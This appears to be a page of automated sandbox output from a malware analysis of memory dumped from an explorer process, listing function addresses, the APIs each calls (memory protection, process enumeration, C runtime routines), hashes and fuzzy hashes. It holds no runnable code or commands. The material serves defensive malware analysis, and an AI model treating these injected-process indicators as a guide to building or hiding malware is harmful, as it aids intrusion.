                                                                                                                                                                                                                        • API ID: _errno$isxdigitstrtol
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1632192098-0
                                                                                                                                                                                                                        • Opcode ID: 2d31757a24e125fede570ebb8f7bcb9f899faaf7790c6e5d89f683251c597ffe
                                                                                                                                                                                                                        • Instruction ID: 676b40b6ef76a5137d9dc9c1bb252ab671238b103298d4e3b614a133a8f6a6ef
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2d31757a24e125fede570ebb8f7bcb9f899faaf7790c6e5d89f683251c597ffe
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A561192A304B848ADBA98BE5E8553AE7BA1F785BC4F494A25CF5F07791DFADC045C300
                                                                                                                                                                                                                        Function 00B4C5B5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00B4C5CE
                                                                                                                                                                                                                          • Part of subcall function 00B6BF69: _lock.LIBCMT ref: 00B6BF7B
                                                                                                                                                                                                                          • Part of subcall function 00B4DE25: std::_Lockit::_Lockit.LIBCPMT ref: 00B4DE3B
                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00B4C633
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 00B4C661
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 00B4C672
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2785702920.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b40000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1776536810-0
                                                                                                                                                                                                                        • Opcode ID: e2dc6706057ffeeb162489ae57a514b8d2dc7903ed4e973984bf69ede096cd14
                                                                                                                                                                                                                        • Instruction ID: eda8d1485be39bba8f3343af73946864470219822f0cbcf66a997bcdc746e687
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e2dc6706057ffeeb162489ae57a514b8d2dc7903ed4e973984bf69ede096cd14
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E011D331218F0C4F8B85EB2CC894A6A77E1FBAC311B0086AEA04AC3375DF74D945CB81
                                                                                                                                                                                                                        Function 00B4C685 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00B4C69E
                                                                                                                                                                                                                          • Part of subcall function 00B6BF69: _lock.LIBCMT ref: 00B6BF7B
                                                                                                                                                                                                                          • Part of subcall function 00B4DE25: std::_Lockit::_Lockit.LIBCPMT ref: 00B4DE3B
                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00B4C703
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 00B4C731
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 00B4C742
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2785702920.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b40000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1776536810-0
                                                                                                                                                                                                                        • Opcode ID: 1623f518e538583328eef252f122764437db6bd078ab6675e1aeddbc0d604b5a
                                                                                                                                                                                                                        • Instruction ID: 00c41acf8e50312b27715141d145f527b917c3dad3a07aa680bf05b94a499024
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1623f518e538583328eef252f122764437db6bd078ab6675e1aeddbc0d604b5a
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62119631218F0C4F8B95EB2CC494A6B77E1FBAC301B408AAEA04AC3365DF74D905CB81
                                                                                                                                                                                                                        Function 02BEC685 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 02BEC69E
                                                                                                                                                                                                                          • Part of subcall function 02C0BF69: _lock.LIBCMT ref: 02C0BF7B
                                                                                                                                                                                                                          • Part of subcall function 02BEDE25: std::_Lockit::_Lockit.LIBCPMT ref: 02BEDE3B
                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 02BEC703
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 02BEC731
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 02BEC742
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2786722156.0000000002BE0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_2be0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1776536810-0
                                                                                                                                                                                                                        • Opcode ID: 1623f518e538583328eef252f122764437db6bd078ab6675e1aeddbc0d604b5a
                                                                                                                                                                                                                        • Instruction ID: a742c286c8f3c9ef408c3b5fa184aca24c11b2a719a44d576833aca4c6b214d8
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1623f518e538583328eef252f122764437db6bd078ab6675e1aeddbc0d604b5a
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A114531618F0C8F9B95EB1CC49466B77E2FB98344B40466E904AC3264DF74D905CF41
                                                                                                                                                                                                                        Function 02BEC5B5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 02BEC5CE
                                                                                                                                                                                                                          • Part of subcall function 02C0BF69: _lock.LIBCMT ref: 02C0BF7B
                                                                                                                                                                                                                          • Part of subcall function 02BEDE25: std::_Lockit::_Lockit.LIBCPMT ref: 02BEDE3B
                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 02BEC633
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 02BEC661
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 02BEC672
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2786722156.0000000002BE0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_2be0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1776536810-0
                                                                                                                                                                                                                        • Opcode ID: e2dc6706057ffeeb162489ae57a514b8d2dc7903ed4e973984bf69ede096cd14
                                                                                                                                                                                                                        • Instruction ID: ac8e077dd5dcf9588ccdb1152798121d889e887df1d4ca0f318aa63069197e11
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e2dc6706057ffeeb162489ae57a514b8d2dc7903ed4e973984bf69ede096cd14
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 37118131218F0C8F8B85EB2CC494A6F77E2FBAC315B404A6A904BC3264DF74D945CB81
                                                                                                                                                                                                                        Function 0B99C685 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0B99C69E
                                                                                                                                                                                                                          • Part of subcall function 0B9BBF69: _lock.LIBCMT ref: 0B9BBF7B
                                                                                                                                                                                                                          • Part of subcall function 0B99DE25: std::_Lockit::_Lockit.LIBCPMT ref: 0B99DE3B
                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0B99C703
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0B99C731
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0B99C742
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2800816052.000000000B990000.00000040.00000400.00020000.00000000.sdmp, Offset: 0B990000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b990000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1776536810-0
                                                                                                                                                                                                                        • Opcode ID: 1623f518e538583328eef252f122764437db6bd078ab6675e1aeddbc0d604b5a
                                                                                                                                                                                                                        • Instruction ID: 4df7926f79712a4c5559173998f7ce9bcf2e5b228077bb7d16c04cafc82e4ffe
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1623f518e538583328eef252f122764437db6bd078ab6675e1aeddbc0d604b5a
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72115131618F0C4F9B95EB2CD894A6A77F1FBE8344B504A2EA04AD3364DE74D905CB81
                                                                                                                                                                                                                        Function 0B99C5B5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0B99C5CE
                                                                                                                                                                                                                          • Part of subcall function 0B9BBF69: _lock.LIBCMT ref: 0B9BBF7B
                                                                                                                                                                                                                          • Part of subcall function 0B99DE25: std::_Lockit::_Lockit.LIBCPMT ref: 0B99DE3B
                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0B99C633
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0B99C661
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0B99C672
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2800816052.000000000B990000.00000040.00000400.00020000.00000000.sdmp, Offset: 0B990000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b990000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1776536810-0
                                                                                                                                                                                                                        • Opcode ID: e2dc6706057ffeeb162489ae57a514b8d2dc7903ed4e973984bf69ede096cd14
                                                                                                                                                                                                                        • Instruction ID: bb0e6d52674813be946aa4805bb786a01d96ddf53f4f45c0628e7aa6a29e78b3
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e2dc6706057ffeeb162489ae57a514b8d2dc7903ed4e973984bf69ede096cd14
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E6118E31218F4C4F8B89EB2CD894AAA77F1FBEC314B50862E904AD3364DE74D905CB81
                                                                                                                                                                                                                        Function 0DFD8500 Relevance: 6.1, APIs: 4, Instructions: 73memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ProtectVirtual$CacheCurrentFlushInstructionProcess
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4115577372-0
                                                                                                                                                                                                                        • Opcode ID: 274a0fd8b95c9ca780f0f6ebdab7d12f3ff7eddeb4a71a8ff20bac583d6269d0
                                                                                                                                                                                                                        • Instruction ID: 91187146cc51a0360ceb051a7ee469b6dfbb66c7f7f786fed7ec55a41e2365ba
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 274a0fd8b95c9ca780f0f6ebdab7d12f3ff7eddeb4a71a8ff20bac583d6269d0
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C31FDA32186C08AC7118F39E9403687B70FB49FD8F4C8226EF894B78ACB2CD454C758
                                                                                                                                                                                                                        Function 0DEF8500 Relevance: 6.1, APIs: 4, Instructions: 73memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ProtectVirtual$CacheCurrentFlushInstructionProcess
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4115577372-0
                                                                                                                                                                                                                        • Opcode ID: 274a0fd8b95c9ca780f0f6ebdab7d12f3ff7eddeb4a71a8ff20bac583d6269d0
                                                                                                                                                                                                                        • Instruction ID: 25dab15a762f955e65adaa5d2bc7dc594f705a1cded6812a6cd317986baa1d57
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 274a0fd8b95c9ca780f0f6ebdab7d12f3ff7eddeb4a71a8ff20bac583d6269d0
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 513101A32186C18BC7118F36E9803687B70F709F88F089216EF894B79ACF2CC450C754
                                                                                                                                                                                                                        Function 00B5D971 Relevance: 6.1, APIs: 4, Instructions: 64COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _IsNonwritableInCurrentImage.LIBCMT ref: 00B5D98E
                                                                                                                                                                                                                          • Part of subcall function 00B64485: _FindPESection.LIBCMT ref: 00B644AE
                                                                                                                                                                                                                        • _initp_misc_cfltcvt_tab.LIBCMT ref: 00B5D99F
                                                                                                                                                                                                                        • _initterm_e.LIBCMT ref: 00B5D9B2
                                                                                                                                                                                                                        • _IsNonwritableInCurrentImage.LIBCMT ref: 00B5D9FB
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2785702920.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b40000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CurrentImageNonwritable$FindSection_initp_misc_cfltcvt_tab_initterm_e
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1991439119-0
                                                                                                                                                                                                                        • Opcode ID: 142ca55874e72eaa3db0a41388c4fe1e2abb69c32ca329fdf64d4b65bf31f656
                                                                                                                                                                                                                        • Instruction ID: 847238de216fb3f69021276b46bf048c658b95fcb40356786619c87565556625
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 142ca55874e72eaa3db0a41388c4fe1e2abb69c32ca329fdf64d4b65bf31f656
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EB118230214A098BFB38EF64EC957EA33E5FB54342B544AE9D903C6165EF389949CB41
                                                                                                                                                                                                                        Function 02BFD971 Relevance: 6.1, APIs: 4, Instructions: 64COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _IsNonwritableInCurrentImage.LIBCMT ref: 02BFD98E
                                                                                                                                                                                                                          • Part of subcall function 02C04485: _FindPESection.LIBCMT ref: 02C044AE
                                                                                                                                                                                                                        • _initp_misc_cfltcvt_tab.LIBCMT ref: 02BFD99F
                                                                                                                                                                                                                        • _initterm_e.LIBCMT ref: 02BFD9B2
                                                                                                                                                                                                                        • _IsNonwritableInCurrentImage.LIBCMT ref: 02BFD9FB
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2786722156.0000000002BE0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_2be0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CurrentImageNonwritable$FindSection_initp_misc_cfltcvt_tab_initterm_e
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1991439119-0
                                                                                                                                                                                                                        • Opcode ID: 142ca55874e72eaa3db0a41388c4fe1e2abb69c32ca329fdf64d4b65bf31f656
                                                                                                                                                                                                                        • Instruction ID: 098809f7d9474e866378957e53ba033224da942c85d1c25b767804c92fc22784
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 142ca55874e72eaa3db0a41388c4fe1e2abb69c32ca329fdf64d4b65bf31f656
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6F11A931114A0A8BF769FF64ECD47E63365FB54344B548569CB03C2064EF389549CE45
                                                                                                                                                                                                                        Function 0B9AD971 Relevance: 6.1, APIs: 4, Instructions: 64COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _IsNonwritableInCurrentImage.LIBCMT ref: 0B9AD98E
                                                                                                                                                                                                                          • Part of subcall function 0B9B4485: _FindPESection.LIBCMT ref: 0B9B44AE
                                                                                                                                                                                                                        • _initp_misc_cfltcvt_tab.LIBCMT ref: 0B9AD99F
                                                                                                                                                                                                                        • _initterm_e.LIBCMT ref: 0B9AD9B2
                                                                                                                                                                                                                        • _IsNonwritableInCurrentImage.LIBCMT ref: 0B9AD9FB
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2800816052.000000000B990000.00000040.00000400.00020000.00000000.sdmp, Offset: 0B990000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b990000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CurrentImageNonwritable$FindSection_initp_misc_cfltcvt_tab_initterm_e
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1991439119-0
                                                                                                                                                                                                                        • Opcode ID: 142ca55874e72eaa3db0a41388c4fe1e2abb69c32ca329fdf64d4b65bf31f656
                                                                                                                                                                                                                        • Instruction ID: a5c2c983e10518c1b0f20dede6698f1cc119c499fd90750d99762663f459e635
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 142ca55874e72eaa3db0a41388c4fe1e2abb69c32ca329fdf64d4b65bf31f656
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 97118230214A098FFB28EF24ECD5BE633A9FF94344B554935D402C2575EE38D545CA81
                                                                                                                                                                                                                        Function 0DFD2E00 Relevance: 6.1, APIs: 4, Instructions: 51processCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Process32$Next$CreateFirstSnapshotToolhelp32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1264244614-0
                                                                                                                                                                                                                        • Opcode ID: e4ae43106cd27e38552f330af00e7cfde6b8ca1cb6c56b1c60f68114623f8363
                                                                                                                                                                                                                        • Instruction ID: 7ba856447acb38a22093f32fcea2f4113ed9a277fd36782996760fca05a2fd21
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e4ae43106cd27e38552f330af00e7cfde6b8ca1cb6c56b1c60f68114623f8363
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E11546221868491DF60DB19E8503AAB372FB897D4F85C221DB9D47A98DF78CA05CB40
                                                                                                                                                                                                                        Function 0DEF2E00 Relevance: 6.1, APIs: 4, Instructions: 51processCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Process32$Next$CreateFirstSnapshotToolhelp32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1264244614-0
                                                                                                                                                                                                                        • Opcode ID: e4ae43106cd27e38552f330af00e7cfde6b8ca1cb6c56b1c60f68114623f8363
                                                                                                                                                                                                                        • Instruction ID: f6ebb692b1b675a43dc3f8d214c1d3177d3db530f2580568d056dd258ace71db
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e4ae43106cd27e38552f330af00e7cfde6b8ca1cb6c56b1c60f68114623f8363
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2811936221868181DF20EB25E8503AEB371FB88794F959221DB9D47AD8DF3CC605CB00
                                                                                                                                                                                                                        Function 0B0A2E00 Relevance: 6.1, APIs: 4, Instructions: 51processCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Process32$Next$CreateFirstSnapshotToolhelp32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1264244614-0
                                                                                                                                                                                                                        • Opcode ID: e4ae43106cd27e38552f330af00e7cfde6b8ca1cb6c56b1c60f68114623f8363
                                                                                                                                                                                                                        • Instruction ID: 78f729c3ba4c5fc9d7c63a3c93f1d53d4f1b3c247078ac5fa16a9bbcadc288b3
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e4ae43106cd27e38552f330af00e7cfde6b8ca1cb6c56b1c60f68114623f8363
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA1193322146849ADF28EB25E4513EAB371FB897D4F844621DA9E47A98EF3CC505CB00
                                                                                                                                                                                                                        Function 0DFD4E3C Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 40stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: strncmp
                                                                                                                                                                                                                        • String ID: false$true
                                                                                                                                                                                                                        • API String ID: 1114863663-2658103896
                                                                                                                                                                                                                        • Opcode ID: 354d05fe94306a40858a042af1019efa880169b646805dad5c3a15f0767e2801
                                                                                                                                                                                                                        • Instruction ID: 5b87dde0bedfa0ac7330a703a2c91c5b48557a663df78f0d5f34dfd7488f822c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 354d05fe94306a40858a042af1019efa880169b646805dad5c3a15f0767e2801
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D4018F6171458086EB80CB6BF5807197361F788FC8F498016DF585BB49DA39C9D08B04
                                                                                                                                                                                                                        Function 0DEF4E3C Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 40stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: strncmp
                                                                                                                                                                                                                        • String ID: false$true
                                                                                                                                                                                                                        • API String ID: 1114863663-2658103896
                                                                                                                                                                                                                        • Opcode ID: 354d05fe94306a40858a042af1019efa880169b646805dad5c3a15f0767e2801
                                                                                                                                                                                                                        • Instruction ID: 152a535d0731030615363661c9e8c90b42f28c8ee68b2e908e7a040d7e27f9b9
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 354d05fe94306a40858a042af1019efa880169b646805dad5c3a15f0767e2801
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F018F6271454186EB40CF66F54072E6760E788FC8F499027DF1D8BF89DE29C5908B14
                                                                                                                                                                                                                        Function 0B0A4E3C Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 40stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
